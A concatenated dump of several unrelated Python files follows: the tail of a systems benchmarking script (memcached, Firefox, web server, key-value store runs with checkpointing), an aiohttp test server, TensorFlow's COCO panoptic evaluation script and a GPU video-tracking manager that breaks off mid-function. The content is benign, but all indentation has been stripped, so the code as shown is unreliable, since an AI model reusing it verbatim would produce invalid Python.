slsckpt(options, [pid])
# SSH into the remote and start agents and main.
agents = []
for n in range(numhosts(options) - 1):
print("Spawning " + options.clients[n])
cmd = [options.mutilate, "-T", "12", "-A"]
ssh = sshcmd(options, host=n + 1)
print(ssh + cmd)
proc = subprocess.Popen(ssh + cmd)
agents.append(proc)
time.sleep(10)
options.runstart = datetime.datetime.now()
cmd = mutilatecmd(options, "--noload", "-B",
"-T", options.mutilatethreads, # Threads (loadgen)
"-c", "12", # Connections Per Thread (loadgen)
"-Q", "1000", # Measurement QPS
"-C", "4", # Measurement Connections
"-w", "5", # Warmup
"-t", "10") # Duration
for n in range(numhosts(options) - 1):
cmd = cmd + ["-a", options.clients[n]]
ssh = sshcmd(options, host=0)
print(ssh + cmd)
p = subprocess.run(ssh + cmd, stdout=subprocess.PIPE)
out = p.stdout.decode('UTF-8')
with open("{}_{}_{}".format("memcached_mutilate",
str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write(out)
for c in agents:
c.kill()
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
# Kill the server
bashcmd(['kill', '-9', str(pid)])
# Wait for kill
# XXX: we should retry
time.sleep(3)
unload(options)
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
['--mutilate'],
{
"action": "store",
"default": "/home/ali/working/mutilate/mutilate",
"help": "Location of mutilate"
}
],
[
['--mutilatethreads'],
{
"action": "store",
"default": "12",
"help": "Number of mutilate threads"
}
]
],
help="Run the memcached/mutilate multiple times")
def mutilatebench(options):
for slsfreq in [0, 1] + list(range(10, 101, 10)):
for i in range(0, 5):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
mutilate(options)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(
options.ckpt_done, ms_elapsed))
def firefox_benchmark(options):
ffoptions = Options()
ffoptions.add_argument('-headless')
profile = FirefoxProfile()
profile.DEFAULT_PREFERENCES['frozen']['network.http.spdy.enabled.http2'] = False
profile.DEFAULT_PREFERENCES['frozen']['browser.tabs.remote.autostart'] = False
profile.DEFAULT_PREFERENCES['frozen']['browser.tabs.remote.autostart.2'] = False
profile.DEFAULT_PREFERENCES['frozen']['autostarter.privatebrowsing.autostart'] = False
cap = DesiredCapabilities().FIREFOX
cap["marionette"] = True
driver = Firefox(firefox_binary=options.firefox, options=ffoptions,
firefox_profile=profile, capabilities=cap)
wait = WebDriverWait(driver, timeout=10000)
url = "http://{}:{}/{}".format(options.benchaddr, options.benchport,
options.firefoxdriver)
driver.get(url)
wait.until(lambda driver: "results" in driver.current_url)
values = urllib.parse.unquote(driver.current_url.split('?')[1])
vals = json.loads(values)
runtime = 0
for key, v in vals.items():
if (key != "v"):
runtime += sum(list(map(int, v)))
with open("{}_{}_{}".format("/root/sls/firefox",
str(options.slsfreq),
str(options.runno)), "w") as outfile:
outfile.write("Time: {} ms".format(runtime))
driver.close()
driver.quit()
# Command for spinning up a Firefox instance and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--firefox'],
{
"action": "store",
"default": "/usr/local/bin/firefox",
"help": "Location of the Firefox binary"
}
],
[
# Default path of the benchmark in the server
['--firefoxdriver'],
{
"action": "store",
"default": "/kraken-1.1/driver.html",
"help": "URL of the driver of the benchmark"
}
],
],
help="Run the Firefox JS benchmark")
def firefox(options):
# XXX Replace with module_init?
load(options)
random.seed()
# Choose a random port every time. Created sockets linger, so if want to be
# able to run the benchmark multiple times we need to use a different port
# each time.
options.benchaddr = "localhost"
options.benchport = str(random.randrange(8000, 16000))
# Create the server, serve forever. This is the server that _serves_ the
# benchmarks, not the benchmark that executes the JS and gets checkpointed.
serverpid = os.fork()
if serverpid == 0:
os.chdir("/root/sls-bench/firefox/hosted")
handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer((options.benchaddr,
int(options.benchport)), handler)
httpd.serve_forever()
# Spawn the new process. This is the process that ultimately spawns the
# benchmark driver that gets checkpointed.
benchpid = os.fork()
if benchpid == 0:
os.chdir(options.mountdir)
firefox_benchmark(options)
sys.exit()
time.sleep(3)
options.runstart = datetime.datetime.now()
# Begin the SLS.
if (options.type in ["slos", "memory"]):
slsckpt(options, [benchpid, serverpid])
# Wait for the benchmark to be done
os.waitpid(benchpid, 0)
options.ckpt_done = int(sysctl_sls("ckpt_done"))
options.ckpt_attempted = int(sysctl_sls("ckpt_attempted"))
options.runend = datetime.datetime.now()
# Kill the server and the driver
cmd = ['kill', '-15', str(serverpid)]
bashcmd(cmd, fail_okay=True)
# XXX Replace with module_fini?
unload(options)
@Command(required=["--server"],
captureOut=CapturedOut.MULTI,
# XXX Find a way to not repeat these, is it possible though with the
# way we're using the parser and building a global object?
add_args=[
[
# Default locations of the binaries and config files
['--lighttpd'],
{
"action": "store",
"default": "/usr/local/sbin/lighttpd",
"help": "Location of lighttpd"
}
],
[
['--nginx'],
{
"action": "store",
"default": "/usr/local/sbin/nginx",
"help": "Location of nginx"
}
],
[
['--tomcat'],
{
"action": "store",
"default": "/usr/local/apache-tomcat-9.0",
"help": "Location of Apache Tomcat directory"
}
],
[
['--lighttpdconfdir'],
{
"action": "store",
"default": "/usr/local/etc/lighttpd",
"help": "Location of lighttpd config dir",
}
],
[
['--nginxconfdir'],
{
"action": "store",
"default": "/usr/local/etc/nginx",
"help": "Location of nginx config dir",
}
],
[
['--threads'],
{
"action": "store",
"default": "10",
"help": "Number of client threads to use"
}
],
[
['--connections'],
{
"action": "store",
"default": "50",
"help": "Number of connections used by wrk",
}
],
[
['--time'],
{
"action": "store",
"default": "10",
"help": "Duration of the benchmark in seconds",
}
],
],
help="Run the webserver benchmark multiple times")
def webbench(options):
for slsfreq in list(range(10, 101, 10)):
for i in range(0, 5):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
webserver(options)
# Command for benchmarking a web server with multiple configurations
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--redis'],
{
"action": "store",
"default": "/usr/local/bin/redis-server",
"help": "Location of the Redis server"
}
],
[
# Default locations of the binaries and config files
['--ycsb'],
{
"action": "store",
"default": "/home/etsal/ycsb/",
"help": "Location of the YCSB directory"
}
],
[
['--recordcount'],
{
"action": "store",
"default": str(10 * 1000),
"help": "Number of records to be loaded into the database"
}
],
[
['--workload'],
{
"action": "store",
"default": "workloada",
"help": "Workload profile to be used with YCSB"}
],
[
['--kvstore'],
{
"action": "store",
"default": "redis",
"help": "The key-value store to be benchmarked",
}
],
[
['--memcached'],
{
"action": "store",
"default": "/usr/local/bin/memcached",
"help": "Location of the memcached server"
}
],
[
['--memcacheduser'],
{
"action": "store",
"default": "root",
"help": "User under which memcached runs"
}
],
[
["--ycsbthreads"],
{
"action": "store",
"default": "16",
"help": "Number of threads for the YCSB client"
}
],
[
["--operationcount"],
{
"action": "store",
"default": str(1000 * 1000),
"help": "Number of target operations from the YCSB client"
}
],
],
help="Run the Redis server")
def kvbench(options):
for slsfreq in [0, 1] + list(range(10, 101, 10)):
for i in range(0, 5):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
kvstore(options)
# Command for spinning up a webserver and taking numbers
@Command(required=[],
captureOut=CapturedOut.MULTI,
add_args=[
[
# Default locations of the binaries and config files
['--firefox'],
{
"action": "store",
"default": "/usr/local/bin/firefox",
"help": "Location of the Firefox binary"
}
],
[
# Default path of the benchmark in the server
['--firefoxdriver'],
{
"action": "store",
"default": "/kraken-1.1/driver.html",
"help": "URL of the driver of the benchmark"
}
],
],
help="Run the Firefox JS benchmark on a loop")
def ffbench(options):
for slsfreq in [0, 1] + list(range(10, 101, 10)):
for i in range(0, 1):
options.slsfreq = slsfreq
options.slsperiod = int((1000 / slsfreq)) if slsfreq != 0 else 0
options.runno = str(i + 1)
# XXX How to call the decorator before the thing
firefox(options)
time_elapsed = options.runend - options.runstart
ms_elapsed = (time_elapsed.seconds * 1000) + \
(time_elapsed.microseconds / 1000)
print("Did {} checkpoints in {}ms)".format(
options.ckpt_done, ms_elapsed))
@Command()
def rocksdb(options):
bashcmd(["benchmarks/rocksdb.sh", options.mountdir])
def main():
global parser
global subparser
global com
options = parser.parse_args()
options.func(options)
if __name__ == "__main__":
main()
|
aiohttp_test_server.py
|
import asyncio
import logging
import threading
import time
import requests
from aiohttp import web
from pyctuator.pyctuator import Pyctuator
from tests.conftest import PyctuatorServer
# mypy: ignore_errors
# pylint: disable=unused-variable
class AiohttpPyctuatorServer(PyctuatorServer):
def __init__(self) -> None:
self.app = web.Application()
self.routes = web.RouteTableDef()
self.pyctuator = Pyctuator(
self.app,
"AIOHTTP Pyctuator",
"http://localhost:8888",
"http://localhost:8888/pyctuator",
"http://localhost:8001/register",
registration_interval_sec=1,
)
@self.routes.get("/logfile_test_repeater")
async def logfile_test_repeater(request: web.Request) -> web.Response:
repeated_string = request.query.get("repeated_string")
logging.error(repeated_string)
return web.Response(text=repeated_string)
@self.routes.get("/httptrace_test_url")
async def get_httptrace_test_url(request: web.Request) -> web.Response:
# Sleep if requested to sleep - used for asserting httptraces timing
sleep_sec = request.query.get("sleep_sec")
if sleep_sec:
logging.info("Sleeping %s seconds before replying", sleep_sec)
time.sleep(int(sleep_sec))
# Echo 'User-Data' header as 'resp-data' - used for asserting headers are captured properly
return web.Response(headers={"resp-data": str(request.headers.get("User-Data"))}, body="my content")
self.app.add_routes(self.routes)
self.thread = threading.Thread(target=self._start_in_thread)
self.should_stop_server = False
self.server_started = False
async def _run_server(self) -> None:
runner = web.AppRunner(self.app)
await runner.setup()
site = web.TCPSite(runner, "localhost", 8888)
await site.start()
self.server_started = True
while not self.should_stop_server:
await asyncio.sleep(1)
await runner.shutdown()
await runner.cleanup()
def _start_in_thread(self) -> None:
loop = asyncio.new_event_loop()
loop.run_until_complete(self._run_server())
loop.stop()
def start(self) -> None:
self.thread.start()
while not self.server_started:
time.sleep(0.01)
def stop(self) -> None:
self.pyctuator.stop()
self.should_stop_server = True
self.thread.join()
|
thread.py
|
from threading import Thread
#func(arg)
#{
#function body
#}
#main loop()
#{
#loop body
#variable=Thread(target=func, args= arg)
#variable.start()
#loop body continues
#}
|
eval_coco_format.py
|
# Copyright 2019 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Computes evaluation metrics on groundtruth and predictions in COCO format.
The Common Objects in Context (COCO) dataset defines a format for specifying
combined semantic and instance segmentations as "panoptic" segmentations. This
is done with the combination of JSON and image files as specified at:
http://cocodataset.org/#format-results
where the JSON file specifies the overall structure of the result,
including the categories for each annotation, and the images specify the image
region for each annotation in that image by its ID.
This script computes additional metrics such as Parsing Covering on datasets and
predictions in this format. An implementation of Panoptic Quality is also
provided for convenience.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import json
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
from PIL import Image
import utils as panopticapi_utils
import six
from new_deeplab.evaluation import panoptic_quality
from new_deeplab.evaluation import parsing_covering
FLAGS = flags.FLAGS
flags.DEFINE_string(
'gt_json_file', None,
' Path to a JSON file giving ground-truth annotations in COCO format.')
flags.DEFINE_string('pred_json_file', None,
'Path to a JSON file for the predictions to evaluate.')
flags.DEFINE_string(
'gt_folder', None,
'Folder containing panoptic-format ID images to match ground-truth '
'annotations to image regions.')
flags.DEFINE_string('pred_folder', None,
'Folder containing ID images for predictions.')
flags.DEFINE_enum(
'metric', 'pq', ['pq', 'pc'], 'Shorthand name of a metric to compute. '
'Supported values are:\n'
'Panoptic Quality (pq)\n'
'Parsing Covering (pc)')
flags.DEFINE_integer(
'num_categories', 201,
'The number of segmentation categories (or "classes") in the dataset.')
flags.DEFINE_integer(
'ignored_label', 0,
'A category id that is ignored in evaluation, e.g. the void label as '
'defined in COCO panoptic segmentation dataset.')
flags.DEFINE_integer(
'max_instances_per_category', 256,
'The maximum number of instances for each category. Used in ensuring '
'unique instance labels.')
flags.DEFINE_integer('intersection_offset', None,
'The maximum number of unique labels.')
flags.DEFINE_bool(
'normalize_by_image_size', True,
'Whether to normalize groundtruth instance region areas by image size. If '
'True, groundtruth instance areas and weighted IoUs will be divided by the '
'size of the corresponding image before accumulated across the dataset. '
'Only used for Parsing Covering (pc) evaluation.')
flags.DEFINE_integer(
'num_workers', 0, 'If set to a positive number, will spawn child processes '
'to compute parts of the metric in parallel by splitting '
'the images between the workers. If set to -1, will use '
'the value of multiprocessing.cpu_count().')
flags.DEFINE_integer('print_digits', 3,
'Number of significant digits to print in metrics.')
def _build_metric(metric,
num_categories,
ignored_label,
max_instances_per_category,
intersection_offset=None,
normalize_by_image_size=True):
"""Creates a metric aggregator objet of the given name."""
if metric == 'pq':
logging.warning('One should check Panoptic Quality results against the '
'official COCO API code. Small numerical differences '
'(< 0.1%) can be magnified by rounding.')
return panoptic_quality.PanopticQuality(num_categories, ignored_label,
max_instances_per_category,
intersection_offset)
elif metric == 'pc':
return parsing_covering.ParsingCovering(
num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
else:
raise ValueError('No implementation for metric "%s"' % metric)
def _matched_annotations(gt_json, pred_json):
"""Yields a set of (groundtruth, prediction) image annotation pairs.."""
image_id_to_pred_ann = {
annotation['image_id']: annotation
for annotation in pred_json['annotations']
}
for gt_ann in gt_json['annotations']:
image_id = gt_ann['image_id']
pred_ann = image_id_to_pred_ann[image_id]
yield gt_ann, pred_ann
def _open_panoptic_id_image(image_path):
"""Loads a COCO-format panoptic ID image from file."""
return panopticapi_utils.rgb2id(
np.array(Image.open(image_path), dtype=np.uint32))
def _split_panoptic(ann_json, id_array, ignored_label, allow_crowds):
"""Given the COCO JSON and ID map, splits into categories and instances."""
category = np.zeros(id_array.shape, np.uint16)
instance = np.zeros(id_array.shape, np.uint16)
next_instance_id = collections.defaultdict(int)
# Skip instance label 0 for ignored label. That is reserved for void.
next_instance_id[ignored_label] = 1
for segment_info in ann_json['segments_info']:
if allow_crowds and segment_info['iscrowd']:
category_id = ignored_label
else:
category_id = segment_info['category_id']
mask = np.equal(id_array, segment_info['id'])
category[mask] = category_id
instance[mask] = next_instance_id[category_id]
next_instance_id[category_id] += 1
return category, instance
def _category_and_instance_from_annotation(ann_json, folder, ignored_label,
allow_crowds):
"""Given the COCO JSON annotations, finds maps of categories and instances."""
panoptic_id_image = _open_panoptic_id_image(
os.path.join(folder, ann_json['file_name']))
return _split_panoptic(ann_json, panoptic_id_image, ignored_label,
allow_crowds)
def _compute_metric(metric_aggregator, gt_folder, pred_folder,
annotation_pairs):
"""Iterates over matched annotation pairs and computes a metric over them."""
for gt_ann, pred_ann in annotation_pairs:
# We only expect "iscrowd" to appear in the ground-truth, and not in model
# output. In predicted JSON it is simply ignored, as done in official code.
gt_category, gt_instance = _category_and_instance_from_annotation(
gt_ann, gt_folder, metric_aggregator.ignored_label, True)
pred_category, pred_instance = _category_and_instance_from_annotation(
pred_ann, pred_folder, metric_aggregator.ignored_label, False)
metric_aggregator.compare_and_accumulate(gt_category, gt_instance,
pred_category, pred_instance)
return metric_aggregator
def _iterate_work_queue(work_queue):
"""Creates an iterable that retrieves items from a queue until one is None."""
task = work_queue.get(block=True)
while task is not None:
yield task
task = work_queue.get(block=True)
def _run_metrics_worker(metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue):
result = _compute_metric(metric_aggregator, gt_folder, pred_folder,
_iterate_work_queue(work_queue))
result_queue.put(result, block=True)
def _is_thing_array(categories_json, ignored_label):
"""is_thing[category_id] is a bool on if category is "thing" or "stuff"."""
is_thing_dict = {}
for category_json in categories_json:
is_thing_dict[category_json['id']] = bool(category_json['isthing'])
# Check our assumption that the category ids are consecutive.
# Usually metrics should be able to handle this case, but adding a warning
# here.
max_category_id = max(six.iterkeys(is_thing_dict))
if len(is_thing_dict) != max_category_id + 1:
seen_ids = six.viewkeys(is_thing_dict)
all_ids = set(six.moves.range(max_category_id + 1))
unseen_ids = all_ids.difference(seen_ids)
if unseen_ids != {ignored_label}:
logging.warning(
'Nonconsecutive category ids or no category JSON specified for ids: '
'%s', unseen_ids)
is_thing_array = np.zeros(max_category_id + 1)
for category_id, is_thing in six.iteritems(is_thing_dict):
is_thing_array[category_id] = is_thing
return is_thing_array
def eval_coco_format(gt_json_file,
pred_json_file,
gt_folder=None,
pred_folder=None,
metric='pq',
num_categories=201,
ignored_label=0,
max_instances_per_category=256,
intersection_offset=None,
normalize_by_image_size=True,
num_workers=0,
print_digits=3):
"""Top-level code to compute metrics on a COCO-format result.
Note that the default values are set for COCO panoptic segmentation dataset,
and thus the users may want to change it for their own dataset evaluation.
Args:
gt_json_file: Path to a JSON file giving ground-truth annotations in COCO
format.
pred_json_file: Path to a JSON file for the predictions to evaluate.
gt_folder: Folder containing panoptic-format ID images to match ground-truth
annotations to image regions.
pred_folder: Folder containing ID images for predictions.
metric: Name of a metric to compute.
num_categories: The number of segmentation categories (or "classes") in the
dataset.
ignored_label: A category id that is ignored in evaluation, e.g. the "void"
label as defined in the COCO panoptic segmentation dataset.
max_instances_per_category: The maximum number of instances for each
category. Used in ensuring unique instance labels.
intersection_offset: The maximum number of unique labels.
normalize_by_image_size: Whether to normalize groundtruth instance region
areas by image size. If True, groundtruth instance areas and weighted IoUs
will be divided by the size of the corresponding image before accumulated
across the dataset. Only used for Parsing Covering (pc) evaluation.
num_workers: If set to a positive number, will spawn child processes to
compute parts of the metric in parallel by splitting the images between
the workers. If set to -1, will use the value of
multiprocessing.cpu_count().
print_digits: Number of significant digits to print in summary of computed
metrics.
Returns:
The computed result of the metric as a float scalar.
"""
with open(gt_json_file, 'r') as gt_json_fo:
gt_json = json.load(gt_json_fo)
with open(pred_json_file, 'r') as pred_json_fo:
pred_json = json.load(pred_json_fo)
if gt_folder is None:
gt_folder = gt_json_file.replace('.json', '')
if pred_folder is None:
pred_folder = pred_json_file.replace('.json', '')
if intersection_offset is None:
intersection_offset = (num_categories + 1) * max_instances_per_category
metric_aggregator = _build_metric(
metric, num_categories, ignored_label, max_instances_per_category,
intersection_offset, normalize_by_image_size)
if num_workers == -1:
logging.info('Attempting to get the CPU count to set # workers.')
num_workers = multiprocessing.cpu_count()
if num_workers > 0:
logging.info('Computing metric in parallel with %d workers.', num_workers)
work_queue = multiprocessing.Queue()
result_queue = multiprocessing.Queue()
workers = []
worker_args = (metric_aggregator, gt_folder, pred_folder, work_queue,
result_queue)
for _ in six.moves.range(num_workers):
workers.append(
multiprocessing.Process(target=_run_metrics_worker, args=worker_args))
for worker in workers:
worker.start()
for ann_pair in _matched_annotations(gt_json, pred_json):
work_queue.put(ann_pair, block=True)
# Will cause each worker to return a result and terminate upon recieving a
# None task.
for _ in six.moves.range(num_workers):
work_queue.put(None, block=True)
# Retrieve results.
for _ in six.moves.range(num_workers):
metric_aggregator.merge(result_queue.get(block=True))
for worker in workers:
worker.join()
else:
logging.info('Computing metric in a single process.')
annotation_pairs = _matched_annotations(gt_json, pred_json)
_compute_metric(metric_aggregator, gt_folder, pred_folder, annotation_pairs)
is_thing = _is_thing_array(gt_json['categories'], ignored_label)
metric_aggregator.print_detailed_results(
is_thing=is_thing, print_digits=print_digits)
return metric_aggregator.detailed_results(is_thing=is_thing)
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
eval_coco_format(FLAGS.gt_json_file, FLAGS.pred_json_file, FLAGS.gt_folder,
FLAGS.pred_folder, FLAGS.metric, FLAGS.num_categories,
FLAGS.ignored_label, FLAGS.max_instances_per_category,
FLAGS.intersection_offset, FLAGS.normalize_by_image_size,
FLAGS.num_workers, FLAGS.print_digits)
if __name__ == '__main__':
flags.mark_flags_as_required(
['gt_json_file', 'gt_folder', 'pred_json_file', 'pred_folder'])
app.run(main)
|
tracking_manager.py
|
import torch
import numpy as np
import torch.multiprocessing as mp
import os,sys
import queue
import time
import psutil
import pynvml
import numpy as np
from track_sequence import track_sequence,im_to_vid
import argparse
pynvml.nvmlInit()
sys.path.insert(0,"I24-video-ingest")
from utilities import get_recording_params, find_files
def get_recordings(ingest_session_path):
params = get_recording_params(ingest_session_path,verbose = False)
file_list = find_files(params[0],params[1],params[2],drop_last_file = True,verbose = False)
# print("INGEST SESSION PATH: {}".format(ingest_session_path))
# print(file_list)
keepers = [item[1].split(".mp4")[0] for item in file_list]
# recording_names = []
# last_recording_num = {}
# for item in os.listdir(os.path.join(ingest_session_path,"recording")):
# recording_names.append(item.split(".mp4")[0])
# # remove all recordings that are currently being written to
# keepers = []
# for item in recording_names:
# for other_item in recording_names:
# camera1 = item.split("_")[1]
# camera2 = other_item.split("_")[1]
# if camera1 == camera2:
# num1 = int(item.split("_")[2].split(".mp4")[0])
# num2 = int(other_item.split("_")[2].split(".mp4")[0])
# if num1 < num2:
# keepers.append(item) # there exists a recording with greater number than item for that camera
return keepers
def get_outputs(ingest_session_path):
recording_names = []
for item in os.listdir(os.path.join(ingest_session_path,"tracking_outputs")):
recording_names.append(item.split("_track_outputs")[0])
return recording_names
def get_in_progress(in_progress):
in_progress_names = []
for key in in_progress.keys():
in_progress_names.append(in_progress[key])
return in_progress_names
def write_to_log(log_file,message,show = False):
"""
All messages passed to this file should be of the form (timestamp, key, message)
valid Keys - START_PROC_SESSION - start of a processing session
END_PROC_SESSION - end of a processing session
INFO - general information
SYS - CPU, GPU, mem utilization info, etc.
WORKER_START - a tracker process has started (name and PID should be given)
WORKER_END - a tracker process has finished (name and PID should be given)
WORKER_TERM - a tracker process has been terminated after finishing (name and PID should be given)
WARNING - parameters outside of normal operating conditions
ERROR - an error has been caught
timestamp - time.time()
message - string
"""
# format time
milliseconds = str(np.round(message[0],4)).split(".")[1]
formatted_time = time.strftime('%Y-%m-%d %H:%M:%S.{}', time.localtime(message[0])).format(milliseconds)
line = "[{}] {}: {} \n".format(formatted_time,message[1],message[2])
if show:
if message[1] not in ["SYS"]:
print(line[:-2])
with open (log_file,"a+") as f:
f.writelines([line])
def log_system(log_file,process_pids = None):
"""
Logs system utilization metrics to log file
"""
# log cpu util
cpu_util = psutil.cpu_percent()
cpu_util_ind = psutil.cpu_percent(percpu = True)
ts = time.time()
key = "INFO"
message = "CPU util: {}% -- Individual utils 1-24: {}".format(cpu_util,cpu_util_ind[:24])
write_to_log(log_file,(ts,key,message))
message = "CPU util: {}% -- Individual utils 25-48: {}".format(cpu_util,cpu_util_ind[24:])
write_to_log(log_file,(ts,key,message))
# log GPU util and memory
try:
max_gpu_util = 0
deviceCount = pynvml.nvmlDeviceGetCount()
for idx in range(deviceCount):
handle = pynvml.nvmlDeviceGetHandleByIndex(idx)
board_num = pynvml.nvmlDeviceGetBoardId(handle)
name = "GPU {}: {} (ID {})".format(idx,pynvml.nvmlDeviceGetName(handle).decode("utf-8"),board_num)
util = pynvml.nvmlDeviceGetUtilizationRates(handle)
fan_util = pynvml.nvmlDeviceGetFanSpeed(handle)
pcie_counter = pynvml.nvmlDeviceGetPcieReplayCounter(handle)
pcie_util = pynvml.nvmlDeviceGetPcieThroughput(handle,pcie_counter)
gpu_util = util.gpu
mem_util = util.memory
message = "{}: Kernel:{}% Mem:{}% Fan:{}% PCIe: {}MB/s".format(name,gpu_util,mem_util,fan_util,round(pcie_util/1000,1))
ts = time.time()
key = "INFO"
write_to_log(log_file,(ts,key,message))
if gpu_util > max_gpu_util:
max_gpu_util = gpu_util
except pynvml.NVMLError as error:
print(error)
# log memory util
mem_util = psutil.virtual_memory()
used = round(mem_util.used / 1e+9,2)
total = round(mem_util.total / 1e+9,2)
ts = time.time()
key = "INFO"
message = "Memory util: {}% ({}/{}GB)".format(round(used/total*100,2),used,total)
write_to_log(log_file,(ts,key,message))
pid_statuses = []
warning = False
if process_pids is not None:
for key in process_pids:
pid = process_pids[key]
try:
os.kill(pid,0)
RUNNING = "running"
except OSError:
RUNNING = "stopped"
warning = True
pid_statuses.append("{} ({}): {}\n".format(key,pid,RUNNING))
ts = time.time()
key = "INFO"
if warning:
key = "WARNING"
write_to_log(log_file,(ts,key,pid_statuses))
last_log_time = time.time()
return last_log_time, max_gpu_util
if __name__ == "__main__":
#add argparse block here so we can optionally run from command line
try:
parser = argparse.ArgumentParser()
parser.add_argument("Ingest_session_directory", help= '<Required> string, Path to ingest session main directory',type = str)
parser.add_argument("Configuration_file", help= '<Required> string, Path to configuration file',type = str)
parser.add_argument("--verbose", help="bool, Show or suppress log messages in terminal", action = "store_true")
args = parser.parse_args()
ingest_session_path = args.Ingest_session_directory
config_file = args.Configuration_file
if args.verbose:
VERBOSE = True
else:
VERBOSE = False
except:
print("Using default path instead")
ingest_session_path = "/home/worklab/Data/cv/video/ingest_session_00011"
ingest_session_path = "/home/worklab/Data/cv/video/5_min_18_cam_October_2020/ingest_session_00005"
config_file = "/home/worklab/Documents/derek/I24-video-processing/config/lambda_quad.config"
VERBOSE = True
log_rate = 5
process_hang_max = 30
last_log_time = 0
# create directory for outputs if needed
if not os.path.exists(os.path.join(ingest_session_path,"tracking_outputs")):
os.mkdir(os.path.join(ingest_session_path,"tracking_outputs"))
# define unique log file for processing session
log_subidx = 0
log_idx = 0
while True:
log_file = os.path.join(ingest_session_path,"logs","cv_tracking_manager_{}_{}.log".format(str(log_idx).zfill(3),log_subidx))
if os.path.exists(log_file):
log_idx += 1
else:
break
write_to_log(log_file,(time.time(),"INFO","STARTED PROCESSING SESSION."),show = VERBOSE)
# get GPU list
g = torch.cuda.device_count()
# availability monitor
available = np.ones(g)
in_progress = {}
# create shared queue
manager = mp.Manager()
ctx = mp.get_context('spawn')
com_queue = ctx.Queue()
all_workers = {}
process_pids = {"manager":manager._process.ident}
DONE = False
time_of_last_message = {}
time_of_last_gpu_util = time.time()
while not DONE:
try:
try:
for idx in range(g):
# initially, start gpu_count processes
if available[idx] == 1:
in_prog = get_in_progress(in_progress)
recordings = get_recordings(ingest_session_path)
done = get_outputs(ingest_session_path)
if len(in_prog) == 0 and len(recordings) <= len(done):
DONE = True
avail_recording = None
for item in recordings:
if item in in_prog or item in done:
continue
else:
avail_recording = item
break
if avail_recording is not None:
# assign this recording to this worker
in_progress[idx] = avail_recording
available[idx] = 0
input_file_dir = get_recording_params(ingest_session_path)[0][0]
input_file = os.path.join(input_file_dir,avail_recording+".mp4")
# change to use Will's utilities
output_directory = os.path.join(ingest_session_path,"tracking_outputs")
camera_id = input_file.split("/")[-1].split("_")[1].upper()
args = [input_file, output_directory, config_file,log_file]
kwargs = {"worker_id":idx, "com_queue":com_queue,"com_rate": log_rate,"config":camera_id}
worker = ctx.Process(target=track_sequence,args = args, kwargs=kwargs)
all_workers[idx] = (worker)
all_workers[idx].start()
# write log message
ts = time.time()
key = "DEBUG"
text = "Manager started worker {} (PID {}) on video sequence {}".format(idx,all_workers[idx].pid,in_progress[idx])
write_to_log(log_file,(ts,key,text),show = VERBOSE)
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager had error {} starting a new process running".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
# periodically, write device status to log file
if time.time() - last_log_time > log_rate:
last_log_time,max_gpu_util = log_system(log_file,process_pids)
if max_gpu_util > 10:
time_of_last_gpu_util = time.time()
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager had error {} logging system info".format(e)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
# monitor queue for messages
try:
message = com_queue.get(timeout = 0)
except queue.Empty:
continue
# strip PID from message and use to update process_pids
try:
if "Loader " in message[2]:
pid = int(message[2].split("PID ")[1].split(")")[0])
id = int(message[2].split("Loader ")[1].split(" ")[0])
process_pids["loader {}".format(id)] = pid
elif "Worker " in message[2]:
pid = int(message[2].split("PID ")[1].split(")")[0])
id = int(message[2].split("Worker ")[1].split(" ")[0])
process_pids["worker {}".format(id)] = pid
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error {} parsing PID and ID from message: {}".format(e,message[2])
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
# write message to log file
worker_id = message[3]
message = message[:3]
write_to_log(log_file,message,show = VERBOSE)
except Exception as e:
ts = time.time()
key = "ERROR"
text = "Manager error '{}' writing message '{}' to log file.".format(e,message)
write_to_log(log_file,(ts,key,text),show = VERBOSE)
raise KeyboardInterrupt
try:
time_of_last_message[worker_id] = time.time()
# if message is a finished task, update manager
key = message[1]
if key == "WORKER_END":
worker_pid = all_workers[worker_id].pid
all_workers[worker_id].terminate()
all_workers[worker_id].join()
del all_workers[worker_id]
# write log message
ts = time.time()
key = "DEBUG"
text = "Manager terminated worker {} (PID {}) on video sequence {}".format(worker_id,worker_pid,in_progress[worker_id])
